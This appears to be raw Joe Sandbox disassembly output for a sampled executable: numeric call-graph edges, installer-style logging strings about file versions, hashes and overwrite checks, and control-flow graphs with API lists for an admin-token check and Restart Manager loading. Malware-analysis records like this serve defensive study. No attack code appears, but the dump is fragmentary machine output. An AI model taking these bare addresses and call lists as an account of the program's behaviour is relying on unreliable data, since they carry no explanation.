54533->54535 54536 47d194 54533->54536 54534 403420 4 API calls 54537 47d333 54534->54537 54538 4790c4 19 API calls 54535->54538 54542 47d2a1 54535->54542 54548 47d1f3 54535->54548 54536->54535 54540 479368 4 API calls 54536->54540 54545 47bb50 43 API calls 54536->54545 54536->54548 54550 47d1fc 54536->54550 54569 479204 54536->54569 54537->54500 54538->54535 54540->54536 54541 47bb50 43 API calls 54541->54542 54542->54535 54542->54541 54544 4540d4 20 API calls 54542->54544 54547 47d23d 54542->54547 54543 47bb50 43 API calls 54543->54550 54544->54542 54545->54536 54546 42c924 5 API calls 54546->54550 54547->54548 54548->54534 54549 42c94c 5 API calls 54549->54550 54550->54536 54550->54543 54550->54546 54550->54547 54550->54549 54580 47ce60 52 API calls 54550->54580 54553 42de14 RegOpenKeyExA 54552->54553 54554 455a01 54553->54554 54555 455a4f 54554->54555 54561 455918 54554->54561 54555->54532 54558 455918 6 API calls 54559 455a30 RegCloseKey 54558->54559 54559->54532 54560->54532 54566 42dd50 54561->54566 54563 455940 54564 403420 4 API calls 54563->54564 54565 4559ca 54564->54565 54565->54558 54567 42dbf8 6 API calls 54566->54567 54568 42dd59 54567->54568 54568->54563 54570 479216 54569->54570 54571 47921a 54569->54571 54570->54536 54572 403450 4 API calls 54571->54572 54573 479227 54572->54573 54574 479247 54573->54574 54575 47922d 54573->54575 54577 4790c4 19 API calls 54574->54577 54576 4790c4 19 API calls 54575->54576 54578 479243 54576->54578 54577->54578 54579 403400 4 API calls 54578->54579 54579->54570 54580->54550 54582 403494 4 API calls 54581->54582 54583 46656a 54582->54583 54584 42dbc0 5 API calls 54583->54584 54585 46657c 54584->54585 54586 42dbc0 5 API calls 54585->54586 54587 46658e 54586->54587 54588 466428 19 API calls 54587->54588 54589 466598 54588->54589 54590 42dbc0 5 API calls 54589->54590 54591 4665a7 54590->54591 54598 4664a0 54591->54598 54594 42dbc0 5 API calls 54595 4665c0 54594->54595 54596 403400 4 API calls 54595->54596 54597 4665d5 54596->54597 54597->54038 54599 4664c0 54598->54599 54600 4078e4 19 API calls 54599->54600 54601 46650a 54600->54601 54601->54594 54603 4242a6 54602->54603 54604 424286 GetWindowTextA 54602->54604 54606 403494 4 API calls 54603->54606 54605 4034e0 4 API calls 54604->54605 54607 4242a4 54605->54607 54606->54607 54607->54518 54609 44b384 11 API calls 54608->54609 54610 44b51f 54609->54610 54610->54524 54613 4650ff 54611->54613 54612 4651da 54622 466eb4 54612->54622 54613->54612 54617 46514f 54613->54617 54634 421a14 54613->54634 54614 465192 54614->54612 54640 4185b0 7 API calls 54614->54640 54617->54614 54618 465194 54617->54618 54619 465189 54617->54619 54621 421a14 7 API calls 54618->54621 54620 421a14 7 API calls 54619->54620 54620->54614 54621->54614 54623 466ee4 54622->54623 54624 466ec5 54622->54624 54623->54099 54625 414b10 4 API calls 54624->54625 54626 466ed3 54625->54626 54627 414b10 4 API calls 54626->54627 54627->54623 54629 46ab29 54628->54629 54630 421a14 7 API calls 54629->54630 54631 46abb4 54630->54631 54631->54122 54632 466988 18 API calls 54631->54632 54632->54122 54633->54124 54635 421a6c 54634->54635 54638 421a22 54634->54638 54635->54617 54636 421a51 54636->54635 54649 421d20 SetFocus GetFocus 54636->54649 54638->54636 54641 408cac 54638->54641 54640->54612 54642 408cb8 54641->54642 54650 406ddc LoadStringA 54642->54650 54645 403450 4 API calls 54646 408ce9 54645->54646 54647 403400 4 API calls 54646->54647 54648 408cfe 54647->54648 54648->54636 54649->54635 54651 4034e0 4 API calls 54650->54651 54652 406e09 54651->54652 54652->54645 54692 46c5c5 54691->54692 54693 46c612 54692->54693 54694 414ae0 4 API calls 54692->54694 54696 403420 4 API calls 54693->54696 54695 46c5db 54694->54695 54890 46674c 6 API calls 54695->54890 54698 46c6bc 54696->54698 54698->54179 54882 408bd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54698->54882 54699 46c5e3 54700 414b10 4 API calls 54699->54700 54701 46c5f1 54700->54701 54702 46c5fe 54701->54702 54704 46c617 54701->54704 54891 47e618 42 API calls 54702->54891 54705 46c62f 54704->54705 54706 466830 CharNextA 54704->54706 54892 47e618 42 API calls 54705->54892 54708 46c62b 54706->54708 54708->54705 54709 46c645 54708->54709 54710 46c661 54709->54710 54711 46c64b 54709->54711 54713 42c994 CharNextA 54710->54713 54893 47e618 42 API calls 54711->54893 54714 46c66e 54713->54714 54714->54693 54894 4668bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54714->54894 54716 46c685 54717 45142c 4 API calls 54716->54717 54718 46c692 54717->54718 54895 47e618 42 API calls 54718->54895 54721 481ac9 54720->54721 54722 481a9b 54720->54722 54724 475934 54721->54724 54896 4941f8 18 API calls 54722->54896 54725 457b30 24 API calls 54724->54725 54726 475980 54725->54726 54727 407298 SetCurrentDirectoryA 54726->54727 54728 47598a 54727->54728 54897 46e128 54728->54897 54732 47599a 54905 459f68 54732->54905 54735 47bb50 43 API calls 54883->54187 54890->54699 54891->54693 54892->54693 54893->54693 54894->54716 54895->54693 54896->54721 54898 46e19b 54897->54898 54900 46e145 54897->54900 54901 46e1a0 54898->54901 54899 479204 19 API calls 54899->54900 54900->54898 54900->54899 54902 46e1c6 54901->54902 55345 44faf0 54902->55345 54904 46e222 54904->54732 54906 459f6e 54905->54906 54907 45a250 4 API calls 54906->54907 54908 459f8a 54907->54908 54908->54735 55348 44fb04 55345->55348 55349 44fb15 55348->55349 55350 44fb01 55349->55350 55351 44fb3f MulDiv 55349->55351 55350->54904 55352 4181d8 55351->55352 55353 44fb6a SendMessageA 55352->55353 55353->55350 53366 42f518 53367 42f523 53366->53367 53368 42f527 NtdllDefWindowProc_A 53366->53368 53368->53367 53369 4358d8 53370 4358ed 53369->53370 53374 435907 53370->53374 53375 4352c0 53370->53375 53379 4352f0 53375->53379 53385 43530a 53375->53385 53376 403400 4 API calls 53377 43570f 53376->53377 53377->53374 53388 435720 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53377->53388 53378 446d9c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53378->53379 53379->53378 53380 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53379->53380 53381 402648 4 API calls 53379->53381 53382 431c98 4 API calls 53379->53382 53383 4038a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53379->53383 53379->53385 53386 403744 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53379->53386 53389 4343a8 53379->53389 53401 434b6c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53379->53401 53380->53379 53381->53379 53382->53379 53383->53379 53385->53376 53386->53379 53388->53374 53390 434465 53389->53390 53391 4343d5 53389->53391 53420 434308 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53390->53420 53393 403494 4 API calls 53391->53393 53394 4343e3 53393->53394 53395 403778 4 API calls 53394->53395 53399 434404 53395->53399 53396 403400 4 API calls 53397 4344b5 53396->53397 53397->53379 53398 434457 53398->53396 53399->53398 53402 493e50 53399->53402 53401->53379 53403 493e88 53402->53403 53404 493f20 53402->53404 53405 403494 4 API calls 53403->53405 53421 448928 53404->53421 53409 493e93 53405->53409 53407 403400 4 API calls 53408 493f44 53407->53408 53410 403400 4 API calls 53408->53410 53411 4037b8 4 API calls 53409->53411 53413 493ea3 53409->53413 53412 493f4c 53410->53412 53414 493ebc 53411->53414 53412->53399 53413->53407 53414->53413 53415 4037b8 4 API calls 53414->53415 53416 493edf 53415->53416 53417 403778 4 API calls 53416->53417 53418 493f10 53417->53418 53419 403634 4 API calls 53418->53419 53419->53404 53420->53398 53422 44894d 53421->53422 53423 448990 53421->53423 53424 403494 4 API calls 53422->53424 53426 4489a4 53423->53426 53433 448524 53423->53433 53425 448958 53424->53425 53430 4037b8 4 API calls 53425->53430 53428 403400 4 API calls 53426->53428 53429 4489d7 53428->53429 53429->53413 53431 448974 53430->53431 53432 4037b8 4 API calls 53431->53432 53432->53423 53434 403494 4 API calls 53433->53434 53435 44855a 53434->53435 53436 4037b8 4 API calls 53435->53436 53437 44856c 53436->53437 53438 403778 4 API calls 53437->53438 53439 44858d 53438->53439 53440 4037b8 4 API calls 53439->53440 53441 4485a5 53440->53441 53442 403778 4 API calls 53441->53442 53443 4485d0 53442->53443 53444 4037b8 4 API calls 53443->53444 53455 4485e8 53444->53455 53445 448620 53447 403420 4 API calls 53445->53447 53446 4486bb 53449 4486c3 GetProcAddress 53446->53449 53450 448700 53447->53450 53448 448655 LoadLibraryA 53448->53455 53452 4486d6 53449->53452 53450->53426 53451 448643 LoadLibraryExA 53451->53455 53452->53445 53453 403b80 4 API calls 53453->53455 53454 403450 4 API calls 53454->53455 53455->53445 53455->53446 53455->53448 53455->53451 53455->53453 53455->53454 53457 43da80 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53455->53457 53457->53455 56396 416b3a 56397 416be2 56396->56397 56398 416b52 56396->56398 56415 415314 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56397->56415 56399 416b60 56398->56399 56400 416b6c SendMessageA 56398->56400 56402 416b86 56399->56402 56403 416b6a CallWindowProcA 56399->56403 56411 416bc0 56400->56411 56412 41a050 GetSysColor 56402->56412 56403->56411 56406 416b91 SetTextColor 56407 416ba6 56406->56407 56413 41a050 GetSysColor 56407->56413 56409 416bab SetBkColor 56414 41a6d8 GetSysColor CreateBrushIndirect 56409->56414 56412->56406 56413->56409 56414->56411 56415->56411 53458 40ce1c 53461 406f00 WriteFile 53458->53461 53462 406f1d 53461->53462 56416 4980b4 56474 403344 56416->56474 56418 4980c2 56477 4056a0 56418->56477 56420 4980c7 56480 40631c GetModuleHandleA GetProcAddress 56420->56480 56426 4980d6 56497 41094c 56426->56497 56428 4980db 56501 412920 56428->56501 56430 4980e5 56506 419038 GetVersion 56430->56506 56747 4032fc 56474->56747 56476 403349 GetModuleHandleA GetCommandLineA 56476->56418 56478 4056db 56477->56478 56748 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56477->56748 56478->56420 56481 406338 56480->56481 56482 40633f GetProcAddress 56480->56482 56481->56482 56483 406355 GetProcAddress 56482->56483 56484 40634e 56482->56484 56485 406364 SetProcessDEPPolicy 56483->56485 56486 406368 56483->56486 56484->56483 56485->56486 56487 40993c 56486->56487 56749 409014 56487->56749 56492 408710 7 API calls 56493 40995f 56492->56493 56764 409060 GetVersionExA 56493->56764 56496 409b70 6F551CD0 56496->56426 56498 410956 56497->56498 56499 410995 GetCurrentThreadId 56498->56499 56500 4109b0 56499->56500 56500->56428 56766 40aef4 56501->56766 56505 41294c 56505->56430 56778 41de1c 8 API calls 56506->56778 56508 419051 56780 418f30 GetCurrentProcessId 56508->56780 56747->56476 56748->56478 56750 408cac 5 API calls 56749->56750 56751 409025 56750->56751 56752 4085cc GetSystemDefaultLCID 56751->56752 56754 408602 56752->56754 56753 406ddc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56753->56754 56754->56753 56755 408558 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 56754->56755 56756 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56754->56756 56758 408664 56754->56758 56755->56754 56756->56754 56757 406ddc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56757->56758 56758->56757 56759 408558 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 56758->56759 56760 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56758->56760 56761 4086e7 56758->56761 56759->56758 56760->56758 56762 403420 4 API calls 56761->56762 56763 408701 56762->56763 56763->56492 56765 409077 56764->56765 56765->56496 56768 40aefb 56766->56768 56767 40af1a 56770 411004 56767->56770 56768->56767 56777 40ae2c 19 API calls 56768->56777 56771 411026 56770->56771 56772 406ddc 5 API calls 56771->56772 56773 403450 4 API calls 56771->56773 56774 411045 56771->56774 56772->56771 56773->56771 56775 403400 4 API calls 56774->56775 56776 41105a 56775->56776 56776->56505 56777->56768 56779 41de96 56778->56779 56779->56508 56796 4078b0 56780->56796 56783 4078b0 19 API calls 56797 4078c3 56796->56797 56798 4075a8 19 API calls 56797->56798 56799 4078d7 GlobalAddAtomA GetCurrentThreadId 56798->56799 56799->56783 58061 41663c 58062 4166a3 58061->58062 58063 416649 58061->58063 58069 4162c2 58063->58069 58073 416548 CreateWindowExA 58063->58073 58064 416650 SetPropA SetPropA 58064->58062 58065 416683 58064->58065 58066 416696 SetWindowPos 58065->58066 58066->58062 58070 4162ee 58069->58070 58071 4162ce GetClassInfoA 58069->58071 58070->58064 58071->58070 58072 4162e2 GetClassInfoA 58071->58072 58072->58070 58073->58064 53463 4222dc 53464 4222eb 53463->53464 53469 42126c 53464->53469 53467 42230b 53470 4212db 53469->53470 53484 42127b 53469->53484 53473 4212ec 53470->53473 53494 4124c8 GetMenuItemCount GetMenuStringA GetMenuState 53470->53494 53472 42131a 53476 42138d 53472->53476 53481 421335 53472->53481 53473->53472 53475 4213b2 53473->53475 53474 42138b 53477 4213de 53474->53477 53496 421e24 11 API calls 53474->53496 53475->53474 53479 4213c6 SetMenu 53475->53479 53476->53474 53483 4213a1 53476->53483 53497 4211b4 10 API calls 53477->53497 53479->53474 53481->53474 53487 421358 GetMenu 53481->53487 53482 4213e5 53482->53467 53492 4221e0 10 API calls 53482->53492 53486 4213aa SetMenu 53483->53486 53484->53470 53493 408d1c 19 API calls 53484->53493 53486->53474 53488 421362 53487->53488 53489 42137b 53487->53489 53491 421375 SetMenu 53488->53491 53495 4124c8 GetMenuItemCount GetMenuStringA GetMenuState 53489->53495 53491->53489 53492->53467 53493->53484 53494->53473 53495->53474 53496->53477 53497->53482
                                                    Strings
                                                    • Incrementing shared file count (64-bit)., xrefs: 00471392
                                                    • Failed to strip read-only attribute., xrefs: 00470CF3
                                                    • Non-default bitness: 32-bit, xrefs: 004706DB
                                                    • Installing the file., xrefs: 00470D29
                                                    • User opted not to overwrite the existing file. Skipping., xrefs: 00470C6D
                                                    • -- File entry --, xrefs: 0047051B
                                                    • Stripped read-only attribute., xrefs: 00470CE7
                                                    • p%G, xrefs: 0047151A
                                                    • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470AD5
                                                    • Dest file exists., xrefs: 004707DB
                                                    • Version of existing file: %u.%u.%u.%u, xrefs: 0047099C
                                                    • Will register the file (a type library) later., xrefs: 00471319
                                                    • Version of our file: (none), xrefs: 0047091C
                                                    • Existing file is a newer version. Skipping., xrefs: 00470A22
                                                    • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470AE4
                                                    • Incrementing shared file count (32-bit)., xrefs: 004713AB
                                                    • Time stamp of our file: (failed to read), xrefs: 004707C7
                                                    • InUn, xrefs: 00470F65
                                                    • Time stamp of existing file: (failed to read), xrefs: 00470857
                                                    • , xrefs: 004709EF, 00470BC0, 00470C3E
                                                    • Couldn't read time stamp. Skipping., xrefs: 00470B55
                                                    • Version of existing file: (none), xrefs: 00470B1A
                                                    • Skipping due to "onlyifdoesntexist" flag., xrefs: 004707EE
                                                    • .tmp, xrefs: 00470DD7
                                                    • Time stamp of our file: %s, xrefs: 004707BB
                                                    • Same version. Skipping., xrefs: 00470B05
                                                    • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470AF0
                                                    • Same time stamp. Skipping., xrefs: 00470B75
                                                    • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 00470CB6
                                                    • Skipping due to "onlyifdestfileexists" flag., xrefs: 00470D1A
                                                    • Will register the file (a DLL/OCX) later., xrefs: 00471325
                                                    • Non-default bitness: 64-bit, xrefs: 004706CF
                                                    • Uninstaller requires administrator: %s, xrefs: 00470F95
                                                    • Dest file is protected by Windows File Protection., xrefs: 0047070D
                                                    • Existing file is protected by Windows File Protection. Skipping., xrefs: 00470C0C
                                                    • Dest filename: %s, xrefs: 004706B4
                                                    • Version of our file: %u.%u.%u.%u, xrefs: 00470910
                                                    • Existing file has a later time stamp. Skipping., xrefs: 00470BEF
                                                    • Time stamp of existing file: %s, xrefs: 0047084B
                                                    • @, xrefs: 004705D0
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.$p%G
                                                    • API String ID: 0-1519224904
                                                    • Opcode ID: c85e02cee53c90be4c09432cdc1bed37a126afc3c982ec3092a00699d9325f6e
                                                    • Instruction ID: 29ad728ada19ee594bb20a6f10617e7c4442303fd1b73b354b0c7f106615fe65
                                                    • Opcode Fuzzy Hash: c85e02cee53c90be4c09432cdc1bed37a126afc3c982ec3092a00699d9325f6e
                                                    • Instruction Fuzzy Hash: 64928534A0528CDFDB11DFA9C485BDDBBB5AF05308F1480ABE848A7392C7789E45CB59

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1546 42e094-42e0a5 1547 42e0b0-42e0d5 AllocateAndInitializeSid 1546->1547 1548 42e0a7-42e0ab 1546->1548 1549 42e27f-42e287 1547->1549 1550 42e0db-42e0f8 GetVersion 1547->1550 1548->1549 1551 42e111-42e113 1550->1551 1552 42e0fa-42e10f GetModuleHandleA GetProcAddress 1550->1552 1553 42e115-42e123 CheckTokenMembership 1551->1553 1554 42e13a-42e154 GetCurrentThread OpenThreadToken 1551->1554 1552->1551 1555 42e261-42e277 FreeSid 1553->1555 1556 42e129-42e135 1553->1556 1557 42e156-42e160 GetLastError 1554->1557 1558 42e18b-42e1b3 GetTokenInformation 1554->1558 1556->1555 1561 42e162-42e167 call 4031bc 1557->1561 1562 42e16c-42e17f GetCurrentProcess OpenProcessToken 1557->1562 1559 42e1b5-42e1bd GetLastError 1558->1559 1560 42e1ce-42e1f2 call 402648 GetTokenInformation 1558->1560 1559->1560 1563 42e1bf-42e1c9 call 4031bc * 2 1559->1563 1572 42e200-42e208 1560->1572 1573 42e1f4-42e1fe call 4031bc * 2 1560->1573 1561->1549 1562->1558 1566 42e181-42e186 call 4031bc 1562->1566 1563->1549 1566->1549 1575 42e20a-42e20b 1572->1575 1576 42e23b-42e259 call 402660 CloseHandle 1572->1576 1573->1549 1579 42e20d-42e220 EqualSid 1575->1579 1583 42e222-42e22f 1579->1583 1584 42e237-42e239 1579->1584 1583->1584 1587 42e231-42e235 1583->1587 1584->1576 1584->1579 1587->1576
                                                    APIs
                                                    • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0CE
                                                    • GetVersion.KERNEL32(00000000,0042E278,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0EB
                                                    • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E278,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E104
                                                    • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E10A
                                                    • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E278,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E11F
                                                    • FreeSid.ADVAPI32(00000000,0042E27F,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E272
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                    • String ID: CheckTokenMembership$advapi32.dll
                                                    • API String ID: 2252812187-1888249752
                                                    • Opcode ID: a9fe6633055198f43e03035385e24ba146a4a62582313a35ed9699780c9b0276
                                                    • Instruction ID: a71ca61110966f780236f7e78469af046a056b7130da329bb4013a210d9377b5
                                                    • Opcode Fuzzy Hash: a9fe6633055198f43e03035385e24ba146a4a62582313a35ed9699780c9b0276
                                                    • Instruction Fuzzy Hash: 65519371B44615EAEF10EAE69C42FBF77ACEB19304F9404BBB901F7281D57899008A79

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1610 450294-4502a1 1611 4502a7-4502b4 GetVersion 1610->1611 1612 450350-45035a 1610->1612 1611->1612 1613 4502ba-4502d0 LoadLibraryA 1611->1613 1613->1612 1614 4502d2-45034b GetProcAddress * 6 1613->1614 1614->1612
                                                    APIs
                                                    • GetVersion.KERNEL32(00480154), ref: 004502A7
                                                    • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480154), ref: 004502BF
                                                    • GetProcAddress.KERNEL32(6E350000,RmStartSession), ref: 004502DD
                                                    • GetProcAddress.KERNEL32(6E350000,RmRegisterResources), ref: 004502F2
                                                    • GetProcAddress.KERNEL32(6E350000,RmGetList), ref: 00450307
                                                    • GetProcAddress.KERNEL32(6E350000,RmShutdown), ref: 0045031C
                                                    • GetProcAddress.KERNEL32(6E350000,RmRestart), ref: 00450331
                                                    • GetProcAddress.KERNEL32(6E350000,RmEndSession), ref: 00450346
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$LibraryLoadVersion
                                                    • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                    • API String ID: 1968650500-3419246398
                                                    • Opcode ID: f300c04dd650cc6e2fa8790a8e0a5b734cbc62ec7341ff736350933aa5c91be4
                                                    • Instruction ID: 86b2f7b41730535ff8ff974bf0b660ab9cb9644c053cd973342487371e557a0c
                                                    • Opcode Fuzzy Hash: f300c04dd650cc6e2fa8790a8e0a5b734cbc62ec7341ff736350933aa5c91be4
                                                    • Instruction Fuzzy Hash: EF11B3B5510301EBD610FB65BF46A2E37EAE728715B08063FE904962A2CB7C8844CF9C

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1674 423c04-423c38 1675 423c3a-423c3b 1674->1675 1676 423c6c-423c83 call 423b60 1674->1676 1678 423c3d-423c59 call 40b434 1675->1678 1681 423ce4-423ce9 1676->1681 1682 423c85 1676->1682 1711 423c5b-423c63 1678->1711 1712 423c68-423c6a 1678->1712 1684 423ceb 1681->1684 1685 423d1f-423d24 1681->1685 1686 423c8b-423c8e 1682->1686 1687 423d48-423d58 1682->1687 1688 423cf1-423cf9 1684->1688 1689 423fa9-423fb1 1684->1689 1692 424092-4240a0 IsIconic 1685->1692 1693 423d2a-423d2d 1685->1693 1690 423c90 1686->1690 1691 423cbd-423cc0 1686->1691 1694 423d63-423d6b call 42418c 1687->1694 1695 423d5a-423d5f 1687->1695 1698 423f0b-423f32 SendMessageA 1688->1698 1699 423cff-423d04 1688->1699 1701 42414a-424152 1689->1701 1706 423fb7-423fc2 call 4181d8 1689->1706 1702 423c96-423c99 1690->1702 1703 423dee-423dfe call 423b7c 1690->1703 1707 423da1-423da8 1691->1707 1708 423cc6-423cc7 1691->1708 1700 4240a6-4240b1 GetFocus 1692->1700 1692->1701 1704 423d33-423d34 1693->1704 1705 4240ce-4240e3 call 424848 1693->1705 1694->1701 1709 423d70-423d78 call 4241d4 1695->1709 1710 423d61-423d84 call 423b7c 1695->1710 1698->1701 1713 424042-42404d 1699->1713 1714 423d0a-423d0b 1699->1714 1700->1701 1722 4240b7-4240c0 call 41efec 1700->1722 1715 424169-42416f 1701->1715 1723 423e16-423e32 PostMessageA call 423b7c 1702->1723 1724 423c9f-423ca2 1702->1724 1703->1701 1717 4240e5-4240ec 1704->1717 1718 423d3a-423d3d 1704->1718 1705->1701 1706->1701 1767 423fc8-423fd7 call 4181d8 IsWindowEnabled 1706->1767 1707->1701 1727 423dae-423db5 1707->1727 1728 423f37-423f3e 1708->1728 1729 423ccd-423cd0 1708->1729 1709->1701 1710->1701 1711->1715 1712->1676 1712->1678 1713->1701 1733 424053-424065 1713->1733 1730 423d11-423d14 1714->1730 1731 42406a-424075 1714->1731 1744 424103-424116 call 424524 1717->1744 1745 4240ee-424101 call 4244cc 1717->1745 1734 423d43 1718->1734 1735 424118-42411f 1718->1735 1722->1701 1782 4240c6-4240cc SetFocus 1722->1782 1723->1701 1741 423ca8-423cab 1724->1741 1742 423e9d-423ea4 1724->1742 1727->1701 1747 423dbb-423dc1 1727->1747 1728->1701 1737 423f44-423f49 call 404e54 1728->1737 1748 423cd6-423cd9 1729->1748 1749 423e37-423e57 call 423b7c 1729->1749 1753 423d1a 1730->1753 1754 423f4e-423f56 1730->1754 1731->1701 1756 42407b-42408d 1731->1756 1733->1701 1755 424143-424144 call 423b7c 1734->1755 1751 424132-424141 1735->1751 1752 424121-424130 1735->1752 1737->1701 1762 423cb1-423cb2 1741->1762 1763 423dc6-423dd4 IsIconic 1741->1763 1764 423ea6-423eb9 call 423b0c 1742->1764 1765 423ed7-423ee8 call 423b7c 1742->1765 1744->1701 1745->1701 1747->1701 1768 423e03-423e11 call 424170 1748->1768 1769 423cdf 1748->1769 1795 423e7b-423e98 call 423a7c PostMessageA 1749->1795 1796 423e59-423e76 call 423b0c PostMessageA 1749->1796 1751->1701 1752->1701 1753->1755 1754->1701 1780 423f5c-423f63 1754->1780 1791 424149 1755->1791 1756->1701 1783 423cb8 1762->1783 1784 423d89-423d91 1762->1784 1773 423de2-423de9 call 423b7c 1763->1773 1774 423dd6-423ddd call 423bb8 1763->1774 1808 423ecb-423ed2 call 423b7c 1764->1808 1809 423ebb-423ec5 call 41ef50 1764->1809 1802 423eea-423ef0 call 41ee9c 1765->1802 1803 423efe-423f06 call 423a7c 1765->1803 1767->1701 1799 423fdd-423fec call 4181d8 IsWindowVisible 1767->1799 1768->1701 1769->1755 1773->1701 1774->1701 1780->1701 1794 423f69-423f78 call 4181d8 IsWindowEnabled 1780->1794 1782->1701 1783->1755 1784->1701 1797 423d97-423d9c call 422c44 1784->1797 1791->1701 1794->1701 1824 423f7e-423f94 call 412308 1794->1824 1795->1701 1796->1701 1797->1701 1799->1701 1825 423ff2-42403d GetFocus call 4181d8 SetFocus call 415238 SetFocus 1799->1825 1822 423ef5-423ef8 1802->1822 1803->1701 1808->1701 1809->1808 1822->1803 1824->1701 1830 423f9a-423fa4 1824->1830 1825->1701 1830->1701
                                                    Memory Dump Source
